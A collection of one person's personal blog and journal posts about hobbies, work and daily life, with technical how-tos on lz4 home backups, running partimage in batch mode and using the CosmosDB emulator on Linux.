slashdot_url: https://slashdot.org/journal/85850/weekend--talent--sport--theatre
---
<p><i>Weekend</i><br>This weekend involved films, work, drinking and sleeping on sofas (not mine). It did not involve wimbledon.<br>The Importance of Being Earnest is now firmly embedded in my memory as one of the funnier things I have seen, starring Mr D'Arcy as someone else.</p>
<p><i>Talent?</i><br>Just finished an hour of guitar practice with my mentor mr kev, and have now completed exercise 50 in the book (of 150). Not quite the musical heights and fame I was hoping for by now, and still no news of that record deal, hur hur. Only positive outcome has been acquisition of the nickname the axe man courtesy of a close personal friend, who says he's inclined to break out the fire axe whenever I play. Thanks for the moral support<nobr> </nobr>;)</p>
<p><i>Sport</i><br>Started playing badminton again, or at least I've been once! I'd forgotten how much fun it can be.</p>
<p><i>Theatre</i><br>Oh, and I've booked some tickets for the play, but it doesn't look like there will be any problems obtaining a few more. So thank you those of you who declined due to being out of the country or who have work etc, and if anyone else isn't sure then you can let me know nearer the time. (Though for now there's a whole row with my name on it). For those who are coming, I need to make plans for eating out, and there will be at least some space to crash at mine if required.</p>
<p>Luv to all</p>
<p>Tim</p>
<file_sep>---
title: "moved"
date: 2004-12-23
slashdot_url: https://slashdot.org/journal/93713/moved
---
<p>Glad that's over.<br>I've moved now. And am still super busy. Life is good though.<br>Left office at 10.30 last night having repatched the network. Then I cleaned the fridge and fixed a few cupboards!<br>Today I have been mostly driving a W-Reg Fiat Uno, which is amusing. (My car failed MOT on its horn.)</p>
<p>Merry xmas one and all, and as Kev said, hope to see you at new year. I think we're having curry in the office today to celebrate, which I'm looking forward to.</p>
<file_sep>---
title: "workworkworkworkworkworkwork..."
date: 2004-11-04
slashdot_url: https://slashdot.org/journal/89346/workworkworkworkworkworkwork
---
<p>lately I have been mostly writing this website:<br><a href="http://www.emapsite.com/streetsahead/">http://www.emapsite.com/streetsahead/</a><br>I worked all weekend and am stretched to the limit, cos tomorrow will be the 13th day of work on the trot without a break.</p>
<p>I've managed to get fedora running nicely on my main box now, up2date and add/remove took a while to get working, and they seem to have removed mozilla's built in mail client in favour of evolution (and thunderbird).<br>I look forward to becoming a hardened linux hacker. Don't suppose any of you know if subversion is as good as the promotional material says it is do you?</p>
<p>Once again, I still need to find people who are looking for a place in Reading, if you know anyone then put them in touch with me.</p>
<p>I'm quite pleased with the progress of the online <a href="http://slashdot.org/~tim_abell/friends">friends list</a>. I'd really like everyone to be part of this network. Everyone say a big hello to our new addition Chris (old friend from back in the dayz!)</p>
<p>Did I mention how much I dislike clothes washing? I've got to hang it all up now. _sigh_</p>
<p>L8r</p>
<file_sep>---
layout: post
title: Startup competitors - Data Viewer
date: 2017-01-17 01:55:27.000000000 +00:00
categories: []
categories: [sdv, startup]
permalink: "/2017/01/17/startup-competitors-data-viewer/"
---
If you follow my ramblings you might know that I've revived my interest in
creating a commercial tool to help devs, dbas etc browse their sql databases.
I've done some research before and didn't find much on a par with what I have
in mind. I've done a bit more, and turned up a couple:
* [A feature of sql
workbench](http://www.sql-workbench.net/fk_lookup_png.html) - I've seen the
product but didn't know it could do that. Not directly competition as it's
not nearly as smooth to use as what I'm building for this particular use
case.
* [SqlSmash](http://www.sqlsmash.com/) - Something I'd not seen before, which
has [fk based navigation (vid)](https://youtu.be/Z0kdqcrYHdo?t=1m14s)
that's basically what I'm building, albeit embedded in SSMS rather than
standalone.
This isn't the first time I've had the experience of getting started before
discovering another product that basically solves the problem I'm gunning for.
([Ready-roll](http://www.red-gate.com/products/sql-development/readyroll/) was
the last, since bought by red-gate).
Now it's not that I thought my idea was magic or special or a unique little
flower, but why is it after working with SQL Server databases for 15 years that
I've only just noticed this tool (which I would have found useful and probably
would have paid for).
If I created another would it be just as obscure? Should I still go ahead even
though it's a solved problem? Are there any ideas left on the earth?
Something for me to consider this week. I might update this post with further
thoughts. Your thoughts are welcome.
---
* You might also like this post: [Database tools I was surprised
existed](/2019/06/10/database-tools-you-didnt-know-about/)
* I did end up building it, and it became <https://schemaexplorer.io/>
<file_sep>---
title: "paris who?"
date: 2004-07-30
slashdot_url: https://slashdot.org/journal/78957/paris-who
---
<p><a href="http://www.banterist.com/archivefiles/000125.html">oh!</a> I've been wondering what the fuss was about.</p>
<file_sep>---
title: Fast backup to external drive with lz4
layout: post
---
The simplest backup is to just tar-gz your home directory, but it's painfully
slow. [A friend](http://blog.luxagen.com/2016/build-backups-an-unexpected-journey/) put me on to [lz4](https://lz4.github.io/lz4/) which isn't installed by default in ubuntu &
mint, it moves the bottleneck from the compressor to disk i/o for my spinning
rust usb disks.
The default output of this is basically silence for two hours while it runs
which isn't great. Enter `pv` ([pipe
viewer](https://www.howtogeek.com/428654/how-to-monitor-the-progress-of-linux-commands-with-pv-and-progress/))
which can show you progress based on byte count.
Install lz4 and pv with:
sudo apt install liblz4-tool pv
And then pipe the output of tar through pv and into lz4
Here's a quick script for backing up my home folder to an external drive;
customize to suit your needs:
```bash
#!/bin/sh
# https://gist.github.com/timabell/68d112d66623d9a4a3643c86a93debee#file-backup-sh
echo "Opening/creating backup folder..."
mountpoint=/media/tim/backup/
cd "$mountpoint"
mkdir -p fox
cd fox
base=/home/
src=tim
echo "Getting source folder size..."
size_bytes=`du -sb "$base/$src" | awk '{print $1}'`
echo "$size_bytes bytes to backup."
echo "Backing up..."
tar -cpC $base $src -P | pv -s "$size_bytes" | lz4 >> "$(date -d "today" +"%Y%m%d-%H%M")-home.tar.lz4"
echo "Done."
```
*This script is also available here:
<https://gist.github.com/timabell/68d112d66623d9a4a3643c86a93debee#file-backup-sh>*
## Things to watch out for
* Progress is inaccurate and variable because it's based on input bytes
processed vs total, but the speed is limited by output bytes to the spinning
rust backup disk, and the ratio varies with the compressability of the input
data.
* Finding a file will require reading or decompressing the entire archive
because of the way tar works.
## Keeping it simple
There's lots of great backup tools for backing up home but most of them create
obscure custom formatted backups, often with incremental backups and chunked up
files for efficient use of space. While that's great I know from experience
that you don't always have all the right tools available to unpack such things
when you really need them, and there's always the chance that you are missing
an important incremental. In short complexity is worrying when it comes to
backup (and especially restore).
## References:
* <https://stackoverflow.com/questions/24063846/how-to-use-tar-with-lz4#24086155>
* <https://superuser.com/questions/168749/is-there-a-way-to-see-any-tar-progress-per-file/665181#665181>
* <https://stackoverflow.com/questions/8228047/adding-timestamp-to-a-filename-with-mv-in-bash/8229220#8229220>
<file_sep>---
title: "Biking"
date: 2004-08-14
slashdot_url: https://slashdot.org/journal/80339/biking
---
<p>Spent an enjoyable afternoon out on the trails north of henley today. Found lots of mud, nettles rocks and things interspersed with the occasional nice view and a fair amount of sunshine. A fairly injury free day given the size of our group. Tried out the new local "fat fish" shop for dinner. Tasty, would recommend, pleasant staff as well which makes such a difference when you're buying cod 'n chips!</p>
<file_sep>---
title: "What's your political persuasion?"
date: 2005-05-25
slashdot_url: https://slashdot.org/journal/107738/whats-your-political-persuasion
---
<p><a href="http://www.theadvocates.org/quiz.html">http://www.theadvocates.org/quiz.html</a></p>
<p>I'm a liberal lefty. (Surprise)</p>
<p>Post your answers as replies to this post<nobr> </nobr>:-)</p>
<file_sep>---
layout: post
title: running partimage in batch mode
date: '2007-04-10T22:01:00.000Z'
author: <NAME>
tags:
- partimage
- dev
- project
modified_time: '2007-04-11T01:08:46.017Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-3391820548015517010
blogger_orig_url: https://timwise.blogspot.com/2007/04/running-partimage-in-batch-mode.html
---
<span style="font-style: italic;">A continuation of the [partimage](http://www.partimage.org/) project.</span>
As it would appear that stdout support doesn't work due the user interface
making use of stdout, I have been figuring out how to make the program run in
batch mode, with a little help from KDevelop.
My continued findings:
The help presents a fully batch mode, -B
$ ./partimage --help
===============================================================================
Partition Image (http://www.partimage.org/) version 0.6.5_beta4 [stable]
---- distributed under the GPL 2 license (GNU General Public License) ----
Supported file systems:....Ext2/3, Reiser3, FAT16/32, HPFS, JFS, XFS,
UFS(beta), HFS(beta), NTFS(experimental)
usage: partimage [options] <action> <device> <image_file>
partimage <imginfo/restmbr> <image_file>
ex: partimage -z1 -o -d save /dev/hda12 /mnt/backup/redhat-6.2.partimg.gz
ex: partimage restore /dev/hda13 /mnt/backup/suse-6.4.partimg
ex: partimage restmbr /mnt/backup/debian-potato-2.2.partimg.bz2
ex: partimage -z1 -om save /dev/hda9 /mnt/backup/win95-osr2.partimg.gz
ex: partimage imginfo /mnt/backup/debian-potato-2.2.partimg.bz2
ex: partimage -a/dev/hda6#/mnt/partimg#vfat -V 700 save /dev/hda12 /mnt/partimg/redhat-6.2.partimg.gz
Arguments:
* <action>:
- save: save the partition datas in an image file
- restore: restore the partition from an image file
- restmbr: restore a MBR of the image file to an hard disk
- imginfo: show informations about the image file
* <device>: partition to save/restore (example: /dev/hda1)
* <image_file>: file where data will be read/written. Can be very big.
For restore, <image_file> can have the value 'stdin'. This allows
for providing image files through a pipe.
Options:
* -z, --compress (image file compression level):
-z0, --compress=0 don't compress: very fast but very big image file
-z1, --compress=1 compress using gzip: fast and small image file (default)
-z2, --compress=2 (compress using bzip2: very slow and very small image file):
* -c, --nocheck don't check the partition before saving
* -o, --overwrite overwrite the existing image file without confirmation
* -d, --nodesc don't ask any description for the image file
* -V, --volume (split image into multiple volumes files)
-VX, --volume=X create volumes with a size of X MB
* -w, --waitvol wait for a confirmation after each volume change
* -e, --erase erase empty blocks on restore with zero bytes
* -m, --allowmnt don't fail if the partition is mounted. Dangerous !
* -M, --nombr don't create a backup of the MBR (Mast Boot Record) in the image file
* -h, --help show help
* -v, --version show version
* -i, --compilinfo show compilation options used
* -f, --finish (action to do if finished successfully):
-f0, --finish=0 wait: don't make anything
-f1, --finish=1 halt (power off) the computer
-f2, --finish=2 reboot (restart the computer):
-f3, --finish=3 quit
* -b, --batch batch mode: the GUI won't wait for an user action
* -BX, --fully-batch=X batch mode without GUI, X is a challenge response string
* -y, --nosync don't synchronize the disks at the end of the operation (dangerous)
* -sX, --server=X give partimaged server's ip address
* -pX, --port=X give partimaged server's listening port
* -g, --debug=X set the debug level to X (default: 1):
* -n, --nossl disable SSL in network mode
* -S, --simulate simulation of restoration mode
* -aX, --automnt=X automatic mount with X options. Read the doc for more details
* -UX --username=X username to authenticate to server
* -PX --password=X password for authentication of user to server
===============================================================================
It is not immediately obvious what "X is a challenge response string" means.
I was able to get the program to run to a limited extent after a bit of searching the internet and trial and error with the option "-B x=y".
Having stepped through the program, it transpires that where I have put "x", the program expects a pattern to match with the title and content of any messages that would otherwise have been shown to the user, and "y" is the pre-programmed response. This is in the "interface_none" section.
"x" has to match the question in the form "message title/message content" and is compared using fnmatch which allows * as a wildcard (anyone got a good reference for fnmatch?).
If the program hits a question for the user, and cannot find a matching answer in the command arguments, "CInterfaceNone::invalid_programmed_response()" fires "exit(8)" and the program dies.
So far I have been running the program as a normal user, which will inevitably fail where it attempts to work with block devices / root owned files & folders. This produces a warning in the user interface, followed by program termination.
To bypass this first "not root" warning, I successfully used this pre-programmed answer:
./partimage -B Warning*=Continue
Alternatively the following is more specific and also works:
./partimage -B Warning*root*=continue
I haven't figured out how to pass more than one predefined answer in batch mode.
The run arguments can be set in KDevelop here:
project > options > debugger > program arguments
_Side note:_
The program has a base class of user interface defined, and then either instantiates interface_none or interface_newt depending on command line arguments.
If not using full batch mode it helps to set "enable separate terminal for application IO" in KDevelop (project > options > debugger) so that you can see the full user interface. However if the program exits then the console closes and any output is lost.
As part of stepping through the code, I came across a macro, which makes the program harder to follow while debugging due to not being able to step through. So I figured out what it did, and wrote out its output C++ code in full:
[interface_none.cpp, line 103](http://partimage.svn.sourceforge.net/viewvc/partimage/trunk/partimage/src/client/interface_none.cpp?revision=1&view=markup&pathrev=20#l_103)
#define MB_2(One,Other,ONE,OTHER) \
int CInterfaceNone::msgBox##One##Other(char *title, char *text, ...) { \
char *result= lookup(title,text,"(unspecified)"); \
va_list al; \
va_start(al,text); \
message_only(#One "/" #Other, title, text, al, result); \
va_end(al); \
if (!strcasecmp(result,#One)) return MSGBOX_##ONE; \
if (!strcasecmp(result,#Other)) return MSGBOX_##OTHER; \
invalid_programmed_response(); \
return 0; \
}
MB_2(Continue,Cancel,CONTINUE,CANCEL)
MB_2(Yes,No,YES,NO)
my expanded version:
//notes: have expanded out macro so I can step through it.
int CInterfaceNone::msgBoxContinueCancel(char *title, char *text, ...) {
char *result= lookup(title,text,"(unspecified)");
va_list al;
va_start(al,text);
message_only("Continue" "/" "Cancel", title, text, al, result);
va_end(al);
if (!strcasecmp(result,"Continue")) return MSGBOX_CONTINUE;
if (!strcasecmp(result,"Cancel")) return MSGBOX_CANCEL;
invalid_programmed_response();
return 0;
}
int CInterfaceNone::msgBoxYesNo(char *title, char *text, ...) {
char *result= lookup(title,text,"(unspecified)");
va_list al;
va_start(al,text);
message_only("Yes" "/" "No", title, text, al, result);
va_end(al);
if (!strcasecmp(result,"Yes")) return MSGBOX_YES;
if (!strcasecmp(result,"No")) return MSGBOX_NO;
invalid_programmed_response();
return 0;
}
**creating a ramdisk for testing.**
[http://www.vanemery.com/Linux/Ramdisk/ramdisk.html](http://www.vanemery.com/Linux/Ramdisk/ramdisk.html)
(I am on ubuntu 6.10 here, details may vary)
$ ls -l /dev/ram*
brw-rw---- 1 root disk 1, 0 2007-04-08 20:10 /dev/ram0
brw-rw---- 1 root disk 1, 1 2007-04-08 20:10 /dev/ram1
brw-rw---- 1 root disk 1, 10 2007-04-08 20:10 /dev/ram10
brw-rw---- 1 root disk 1, 11 2007-04-08 20:10 /dev/ram11
brw-rw---- 1 root disk 1, 12 2007-04-08 20:10 /dev/ram12
brw-rw---- 1 root disk 1, 13 2007-04-08 20:10 /dev/ram13
brw-rw---- 1 root disk 1, 14 2007-04-08 20:10 /dev/ram14
brw-rw---- 1 root disk 1, 15 2007-04-08 20:10 /dev/ram15
brw-rw---- 1 root disk 1, 2 2007-04-08 20:10 /dev/ram2
brw-rw---- 1 root disk 1, 3 2007-04-08 20:10 /dev/ram3
brw-rw---- 1 root disk 1, 4 2007-04-08 20:10 /dev/ram4
brw-rw---- 1 root disk 1, 5 2007-04-08 20:10 /dev/ram5
brw-rw---- 1 root disk 1, 6 2007-04-08 20:10 /dev/ram6
brw-rw---- 1 root disk 1, 7 2007-04-08 20:10 /dev/ram7
brw-rw---- 1 root disk 1, 8 2007-04-08 20:10 /dev/ram8
brw-rw---- 1 root disk 1, 9 2007-04-08 20:10 /dev/ram9
create and mount test ramdisk
# mke2fs /dev/ram0
# mkdir /media/ram0
# mount /dev/ram0 /media/ram0
add a test file and unmount the disk
# echo "test data #1." >> /media/ram0/foo.txt
# umount /media/ram0
the above, as a script:
#!/bin/bash
# create and mount test ramdisk
mke2fs /dev/ram0
if [ ! -d /media/ram0 ]; then
mkdir /media/ram0
fi
mount /dev/ram0 /media/ram0
#add a test file and unmount the disk
echo "test file." >> /media/ram0/foo.txt
date >> /media/ram0/foo.txt
cat /media/ram0/foo.txt
umount /media/ram0
Create & run script (as root, because it (un)mounts a file system, and creates a dir in a root owned folder):
$ gedit mkram.sh
$ chmod ug+x mkram.sh
$ sudo ./mkram.sh
Weirdly, partimage won't run in full batch mode without a second part to the -B switch, even if it's set up to not need to ask any questions. Supplying a dummy "x=y" seems sufficient to fool it.
Running as root without asking for partition description works:
$ sudo ./partimage -d -B x=y save /dev/ram0 ram0.img
Restore image to a different ramdisk and check file:
$ sudo ./partimage -B x=y restore /dev/ram1 ram0.img.000
$ sudo mount /dev/ram1 /media/ram1
$ cat /media/ram1/foo.txt
test file.
Mon Apr 9 12:56:59 BST 2007
Success!
Script for checking file in saved partition:
#!/bin/bash
# mount and check restored ramdisk
if [ ! -d /media/ram1 ]; then
mkdir /media/ram1
fi
mount /dev/ram1 /media/ram1
cat /media/ram1/foo.txt
umount /media/ram1
To debug in KDevelop as root (in ubuntu):
* alt-F2 (run)
* gksudo kdevelop
* open project... (go find existing copy)
So in summary, I have made progress in understanding the ways of this useful utility, and am a step closer to making a useful contribution to the project.
The rambling nature of this post reflects the way in which one begins to understand a new program. Hopefully it's not too hard to follow, or pick out the useful pieces. All feedback gratefully appreciated.
Tim.
<file_sep>---
title: "Yawn"
date: 2003-11-27
slashdot_url: https://slashdot.org/journal/53402/yawn
---
<p>Not getting enough sleep.<br>Too much stress.<br>Must learn<nobr> </nobr>/.NET<br>Failing to spend required hours.<br>Arrr, downhill spiral.<br>Think I'll make up for it with a shopping trip.<br>arr, the b3ta(.com) beast just disappeared 20mins of my life</p>
<file_sep>---
title: "Cycling"
date: 2004-03-08
slashdot_url: https://slashdot.org/journal/64581/cycling
---
<p>Went cycling with HG, Steve, Crash and Spud yesterday down in Dorking. Was super. Included in our tour a pub (of course), many miles of trail, and of note, a 30ft drop off which I probably wouldn't have done without the encouragement of the local beer (:</p>
<p>Am now suitably tired. Regretted taking tonight of swimming as was bored instead, still, got some coding done and had dinner for a change. Have made up mind to go to pool super early tomorrow and do as much as possible.</p>
<p>Currently trying to Learn XP Pro, C# for windows apps, ASP.NET, Linux stuff and a play all at once. Struggling a little, unsurprisingly. Work is about to get even busier for me I fear, if that's possible.</p>
<file_sep>---
title: "WhoIs Privacy"
date: 2003-12-04
slashdot_url: https://slashdot.org/journal/54070/whois-privacy
---
<p>Just came accross <a href="http://www.internetprivacyadvocate.org/ProtectYourPersonalInfo.htm"> this</a>. Network Solutions wants to end publicising who owns domain names. My response follow:</p>
<p>[x] I am not a Network Solutions customer<br>[x] The privacy of my personal data is important to me.<br>[ ] I support WHOIS rules that would limit online access to my personal information.<br>[ ] I offer strong support to proposals that promote personal privacy and rules that restrict providing my information to third-party organizations. This includes Network Solutions' proposal to the Internet Corporation for Assigned Names and Numbers (ICANN) to eliminate the Bulk WHOIS access obligation.</p>
<p>Comments<br>---------<br>I think it is important that such information remain publically available. If you don't like what people use it for then persue that line instead of trying to hide who you are. If enough people put effort into preventing abuse (ambiguous I know) of "the internet" then the problems of abuse will be diminished.</p>
<p>Pretending you don't exist will leave us all worse off, and make tracking down abuse harder.</p>
<p>------------<br>I think the second point is there just to achieve a good number so they can skew the meaning later.</p>
<file_sep>---
title: "Swimming"
date: 2004-01-13
slashdot_url: https://slashdot.org/journal/58121/swimming
---
<p>1km, I did it! 40 lengths. In 50 mins. Must've been the new trunks that did it, so much more comfortable, and so much less hassle, even if they are slightly embarrassing.<br>I did drive in mind. But I shall still be on my bike to work, just had to come back here in between to get the car picked up.</p>
<p>I am sooo tired. I've been "helping" the local drama bunch lately, so I was out till late last night again, then I had to go to Asda coz my cupboards were bare. Not without going to the pub first of course!</p>
<file_sep>---
title: Website builders for non-programmers
layout: post
---
Here's some tools that you can use if you're not a coder but want to put up a website.
I do custom coding, but sometimes non-technical folk ask me how to build a website, so here's a list of tools that allow you to create a site without having to know how to code.
- [webflow.com](https://webflow.com/)
- [Notion as a website builder](https://www.notion.so/help/guides/build-a-website-with-notion-in-seconds-no-coding-required)
- [bricksbuilder.io](https://bricksbuilder.io/)
- [brixbuilder.com](https://www.brixbuilder.com/)
- [squarespace.com](https://www.squarespace.com/)
- [wordpress.com](https://wordpress.com/)
- [Jekyll + github pages](/2019/06/24/setting-up-a-jekyll-blog/) if you're feeling a bit brave
Hope that's helpful, they aren't in any particular order of preference so try them out and see what works for you.
If you find others that should be on here then please drop me an email and I'll add any suggestions.
If you found this useful then go ahead and share with anyone else who you think might find this useful.
<file_sep>---
layout: page
title: Payment successful, thanks!
---
Any problems get in touch <<EMAIL>>
<file_sep>---
title: "Swimming"
date: 2004-01-08
slashdot_url: https://slashdot.org/journal/57574/swimming
---
<p>24 lengths today, but in a slightly dismal 40 minutes.</p>
<p>Still I am getting better. Did much more front crawl today (still mostly half lengths) but did swallow/breath a fairly significant amount of chlorinated water.</p>
<p>From the 3 lengths I managed on the 2nd Dec 03, in an hour. That's much better.</p>
<p>I've been : Tue & Thur 2,4,9,11,16,18,23rd Dec, Sat 3rd Jan, Tue & Thur 6, 8th Jan.<br>That's.... 10 times! Yay.</p>
<file_sep>---
title: "Also - music"
date: 2003-12-12
slashdot_url: https://slashdot.org/journal/54880/also---music
---
<p>I wrote a song to be played by <a href="http://www.sr.se/cgi-bin/p1/src/sing/default.asp"></a><br>this singing thing<br><i><br>be happy, don't worry.<br>feel glad, it's not that bad<br>the sun shines,<br>our friends are close to us</i></p>
<p><i>all the fear is far away<br>so be happy and be gay</i></p>
<file_sep>---
layout: post
title: Get emailed Tim's blog and photos
date: '2007-05-27T17:35:00.000Z'
author: <NAME>
tags:
modified_time: '2007-05-27T17:50:34.011Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-5421384601534929039
blogger_orig_url: https://timwise.blogspot.com/2007/05/get-emailed-tims-blog-and-photos.html
---
Can't be bothered to check here and see if I've written anything this month? Great news! You can now have my blog entries and latest flickr photos sent to you by email thanks to the feedblitz service.
You can subscribe to my blog using the email box on the bottom of the right hand menu, or by clicking [here](http://www.feedblitz.com/f/?Sub=216154).
You can subscribe to my flickr photo feed [here](http://www.feedblitz.com/f/?Sub=216268) (public photos only - you have to be my flickr contact to see photos of friends I post).
<file_sep>---
title: "Get with the (music) program - podsafe radio"
date: 2006-04-28
slashdot_url: https://slashdot.org/journal/134479/get-with-the-music-program---podsafe-radio
---
<p>I've been looking for a show to listen to for some time that has some decent music in it. Finally I've found one:<br>The podshow music rewind: <a href="http://rewind.podshow.com/">http://rewind.podshow.com/</a><br>Check it out. This guy plays clips from all the podshows, showcasing the best new music from the podsafe music network.</p>
<p>I came across it thanks to <NAME> <a href="http://curry.com/">http://curry.com/</a></p>
<p>Fyi: you can subscribe with:<br>iTunes (easy)<br>Juice (desiigned for the job) <a href="http://juicereceiver.sourceforge.net/index.php">http://juicereceiver.sourceforge.net/index.php</a><br>or bashpodder (quick & effective linux script) <a href="http://linc.homeunix.org:8080/scripts/bashpodder/">http://linc.homeunix.org:8080/scripts/bashpodder/</a> - my favourite<br>there's many more of course.</p>
<file_sep>---
title: "how to destroy the earth"
date: 2005-06-03
slashdot_url: https://slashdot.org/journal/108484/how-to-destroy-the-earth
---
<p>settle in. it's a long read...<br><a href="http://ned.ucam.org/~sdh31/misc/destroy.html">http://ned.ucam.org/~sdh31/misc/destroy.html</a></p>
<p>link courtesy of the b3ta newsletter</p>
<file_sep>---
title: Running the CosmosDB emulator on Linux
layout: post
---
Update: microsoft have released a linux compatible docker image it seems, let me know if it actually works and I'll update this post. <https://docs.microsoft.com/en-us/azure/cosmos-db/linux-emulator>
----
Unfortunately even though "Microsoft 🖤 Linux" the CosmosDB team seem less keen. This is not fun, pretty or stable, but at least it works which is something.
There is a docker image but it only runs on docker-for-windows so it's no help here.
## Overview
1. Grab a Windows VM, install the emulator.
2. Copy the emulator SSL cert to the host.
3. Map the ports.
4. Redirect the VM IP back to localhost with iptables.
## Steps
### Get a Windows VirtualBox VM Running
Download the VirtualBox image from <https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/> (2 month free trial, no key needed).
Install VirtualBox.
Fix the VM image configuration (if you are using the slightly older VirtualBox from ubuntu's apt repositories) by removing `controller="VBoxSVGA"` from the `.ovf` file in the `.ova` file (which is a tar.gz archive). See <https://schnouki.net/post/2020/how-to-run-a-win10-dev-vm-on-virtualbox-5/> for details.
Import the VM into VirtualBox
Run the VM
Install the guest additions (Devices > Insert guest additions CD)
Set the timezone (VM defaults to US).
Turn on seamless copy-paste & drag-and-drop (so that we can move certificate and data files to/from the host easily).
### Set up the CosmosDB emulator
In the Windows VM download and install the CosmosDB emulator in the VM from <https://docs.microsoft.com/en-us/azure/cosmos-db/local-emulator?tabs=ssl-netstd21#installation>
If the emulator is already running, shut it down:
```powershell
cd "C:\Program Files\Azure Cosmos DB Emulator"
.\Microsoft.Azure.Cosmos.Emulator.exe /shutdown
```
Start the emulator with network access enabled.
```powershell
cd "C:\Program Files\Azure Cosmos DB Emulator"
.\Microsoft.Azure.Cosmos.Emulator.exe /AllowNetworkAccess /DisableRateLimiting /Key='<KEY>
```
(This key is the hard-coded well-known key that the emulator uses by default, which makes it easy to connect the storage explorer).
Check it is listening on `0.0.0.0:8081` (as opposed to `127.0.0.1:8081`):
```
netstat -a |findstr 8081
```
### Map the CosmosDB port to the host
In the VirtualBox network settings for the VM, click advanced and add a port mapping for 8081 on the VM to 8081 on the host.
See <https://www.howtogeek.com/122641/how-to-forward-ports-to-a-virtual-machine-and-use-it-as-a-server/>
This makes the emulator appear as if it was running on the Linux host.
(Note there are replica ports that need mapping too, see the dotnet-core section below).
### Connect with Storage Explorer
Install the Azure Storage Explorer on your Linux host, either with the .tar.gz or from the snap store
<https://azure.microsoft.com/en-us/features/storage-explorer/>
Run the storage explorer.
Connect to the emulator on localhost.
You should now be able to create collections and add documents, and then view them.
### Connecting from dotnet-core
Problems connecting from core that I didn't encounter with storage explorer:
1. The SSL certificate is rejected.
2. CosmosDB sets the [`ReadEndpoint`](https://docs.microsoft.com/en-us/dotnet/api/microsoft.azure.documents.client.documentclient.readendpoint) to be the VM's IP address, which isn't accessible from the host because we are using NAT and port mapping. (Oddly this wasn't consistently the internal IP address.)
3. The replicas listen on additional ports which also need mapping.
#### Accepting the emulator SSL certificate
This is the error you get trying to connect to the CosmosDB emulator from dotnet core on Linux without adding the certificate to the Linux host's certificate authority (CA) list:
```
System.Net.Http.HttpRequestException:
The SSL connection could not be established,
see inner exception. ---> System.Security.Authentication.AuthenticationException:
The remote certificate is invalid according to the validation procedure.
at at System.Net.Security.SslStream.StartSendAuthResetSignal(
ProtocolToken message, AsyncProtocolRequest asyncRequest, ExceptionDispatchInfo exception)
```
Export the emulator's public SSL certificate "DocumentDbEmulatorCertificate" as base64 X509.
Reference: <https://docs.microsoft.com/en-us/azure/cosmos-db/local-emulator-export-ssl-certificates#how-to-export-the-azure-cosmos-db-tlsssl-certificate>
Copy the exported file to your Linux host.
Add the certificate to the trusted certificates on your machine (these instructions are for Ubuntu/Mint):
```
sudo cp --verbose cosmos-emulator.cer /usr/local/share/ca-certificates/cosmos-emulator.crt
sudo update-ca-certificates --verbose
```
Reference: <https://stackoverflow.com/questions/44159793/trusted-root-certificates-in-dotnet-core-on-linux-rhel-7-1/44160125#44160125>
Note the change in file extension from `.cer` to `.crt` between export and import (I'm not 100% sure if this matters).
*Note that the certificate is regenerated on emulator startup* so you'll either have to do this every time or pass the emulator a predefined certificate to use.
If you want to validate the certificate has been installed, see <https://unix.stackexchange.com/questions/97244/list-all-available-ssl-ca-certificates>
#### Redirecting ReadEndpoint traffic
In the VM in a powershell or command prompt run `ipconfig` to get the machine's IP address.
Tell `iptables` to redirect all requests for the VM's IP address back to `localhost`:
```bash
sudo iptables -t nat -I OUTPUT --dst 10.0.2.XXX -p tcp --dport 8081 -j REDIRECT --to-ports 8081
```
Where `XXX` is the IP of your VM.
As per: <https://unix.stackexchange.com/questions/441182/how-to-map-an-ip-address-to-localhost>
#### Mapping replica port(s)
On the VM run `netstat -a |findstr LISTENING`
You'll see a bunch of ports in the 10,000-20,000 range. These are the replicas
I found out which ports to map by running the client code and looking at the exception when it failed to connect. It was only port `10253` for me so far. Here's the error for a failure:
```
Microsoft.Azure.Documents.ServiceUnavailableException: Service is currently unavailable.
ActivityId: 2dfaf5dc-0d5a-4ed7-828d-c16cdcd117a3,
RequestStartTime: 2020-09-17T20:00:16.8868999Z, RequestEndTime: 2020-09-17T20:00:46.7777188Z, Number of regions attempted: 1
ResponseTime: 2020-09-17T20:00:16.9400284Z, StoreResult: StorePhysicalAddress: rntbd://10.0.2.15:10253/apps/DocDbApp/services/DocDbServer15/partitions/a4cb495b-38c8-11e6-8106-8cdcd42c33be/replicas/1p/, LSN: -1, GlobalCommittedLsn: -1, PartitionKeyRangeId: , IsValid: False, StatusCode: 410, SubStatusCode: 0, RequestCharge: 0, ItemLSN: -1, SessionToken: , UsingLocalLSN: True, TransportException: A client transport error occurred: Failed to connect to the remote endpoint. (Time: 2020-09-17T20:00:16.9221735Z, activity ID: 2dfaf5dc-0d5a-4ed7-828d-c16cdcd117a3, error code: ConnectFailed [0x0005], base error: socket error ConnectionRefused [0x0000274D], URI: rntbd://10.0.2.15:10253/, connection: <not connected> -> rntbd://10.0.2.15:10253/, payload sent: False, CPU history: not available, CPU count: 8), ResourceType: Document, OperationType: Query
```
Add these ports to the VirtualBox port mapping configuration for your VM.
In the VM in a powershell or command prompt run `ipconfig` to get the machine's IP address.
Tell `iptables` to redirect all requests for the VM's IP address back to `localhost`:
```bash
sudo iptables -t nat -I OUTPUT --dst 10.0.2.XXX -p tcp --dport 10253 -j REDIRECT --to-ports 10253
```
Where `XXX` is the IP of your VM and `10253` is the replica port.
As per: <https://unix.stackexchange.com/questions/441182/how-to-map-an-ip-address-to-localhost>
## Importing data
If you need to import data then use data migration tool from <https://docs.microsoft.com/en-us/azure/cosmos-db/import-data#Install>
## Success
With all of the above I was then able to connect a dotnet-core application on Linux to a CosmosDB emulator.
## Emulator failures
After a while and some unrecorded fiddling, the emulator then gave up the ghost, resulting in the Azure Storage Explorer reporting the apparently meaningless error message "Unable to retrieve child resources."
According to the internet this error could mean anything. <https://social.technet.microsoft.com/wiki/contents/articles/53393.azure-storage-explorer-troubleshooting-unable-to-retrieve-child-resources-or-the-request-action-could-not-be-completed.aspx>
I might just blow the whole VM away and start again...
## Should you use CosmosDB?
CosmosDB comes with significantly increased costs:
* I gather it's very expensive to run in production
* Development is painful
As a result you should only choose CosmosDB for your solution if you *really* need something it offers that you can't get from a more straight-forward SQL or DocumentDB solution and your domain is a good match for the document-database (aka NoSQL) model.
## Further reading
* [Azure Development using CosmosDB offline Emulator by <NAME>](https://medium.com/faun/comosdb-offline-emulator-78559ae91cd1)
<file_sep>---
title: "google funds open source development"
date: 2005-06-02
slashdot_url: https://slashdot.org/journal/108390/google-funds-open-source-development
---
